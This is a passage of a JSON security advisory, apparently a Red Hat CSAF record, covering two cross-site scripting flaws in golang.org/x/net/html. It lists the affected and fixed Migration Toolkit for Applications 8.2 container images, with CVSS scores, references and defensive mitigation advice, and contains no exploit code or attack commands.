"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480761"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/net/html. A remote attacker could exploit this vulnerability by providing specially crafted HTML. When this arbitrary HTML is parsed and rendered, it can result in an unexpected HTML tree, bypassing input sanitization. This can be leveraged to execute Cross-Site Scripting (XSS) attacks, potentially leading to arbitrary code execution in applications that use the affected component.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/net/html: golang.org/x/net/html: Arbitrary code execution via Cross-Site Scripting",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important vulnerability in `golang.org/x/net/html` could enable remote attackers to execute Cross-Site Scripting (XSS) attacks, potentially leading to arbitrary code execution. The flaw allows specially crafted HTML to bypass input sanitization during parsing and rendering. Red Hat products are affected if they process untrusted HTML content using the vulnerable component without additional output encoding or robust content security policies.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25681"
},
{
"category": "external",
"summary": "RHBZ#2480761",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480761"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25681",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25681"
},
{
"category": "external",
"summary": "https://go.dev/cl/781703",
"url": "https://go.dev/cl/781703"
},
{
"category": "external",
"summary": "https://go.dev/issue/79574",
"url": "https://go.dev/issue/79574"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8",
"url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5029",
"url": "https://pkg.go.dev/vuln/GO-2026-5029"
}
],
"release_date": "2026-05-22T15:01:21.975000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To mitigate this flaw, applications processing untrusted HTML input must implement strict input sanitization and ensure all output is properly encoded before rendering. Deploying a comprehensive Content Security Policy (CSP) can restrict script execution, further reducing the attack surface. Administrators should review application configurations to ensure adequate protection against XSS.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/net/html: golang.org/x/net/html: Arbitrary code execution via Cross-Site Scripting"
},
{
"cve": "CVE-2026-27136",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-05-22T16:00:56.609820+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480757"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang.org/x/net/html. When arbitrary HTML is parsed and then rendered, it can result in an unexpected HTML tree. This allows an attacker to bypass HTML sanitization mechanisms, leading to Cross-Site Scripting (XSS) attacks in applications. Such attacks can result in information disclosure or arbitrary code execution.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/net/html: golang: golang.org/x/net/html: Cross-Site Scripting via HTML parsing bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in `golang.org/x/net/html` is rated as Important. It allows for Cross-Site Scripting (XSS) attacks by enabling an attacker to bypass HTML sanitization mechanisms when arbitrary HTML is parsed and rendered. This can lead to information disclosure or arbitrary code execution in affected applications. Exploitation typically requires user interaction, where a user processes specially crafted malicious HTML content.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
